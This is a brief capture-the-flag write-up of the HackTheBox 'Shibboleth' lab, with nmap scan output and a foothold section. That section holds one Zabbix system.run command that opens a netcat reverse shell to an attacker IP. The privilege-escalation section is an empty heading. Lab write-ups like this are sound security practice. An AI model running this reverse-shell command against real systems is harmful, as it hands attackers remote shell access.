HackTheBox-Shibboleth

NMAP

PORT   STATE SERVICE REASON         VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://shibboleth.htb/
Service Info: Host: shibboleth.htb

PORT 80 (HTTP)

nmap -p 1-1000 -sU --min-rate 5000 10.129.231.205 -vv
PORT STATE SERVICE REASON
45/udp closed mpm port-unreach ttl 63
179/udp closed bgp port-unreach ttl 63
243/udp closed sur-meas port-unreach ttl 63
422/udp closed ariel3 port-unreach ttl 63
459/udp closed ampr-rcmd port-unreach ttl 63
623/udp open asf-rmcp udp-response ttl 63
892/udp closed unknown port-unreach ttl 63

Foothold

system.run["rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.25 2222 >/tmp/f",nowait]

Privilege Escalation (ipmi-svc)

ARZ101

Pentester | CTF Player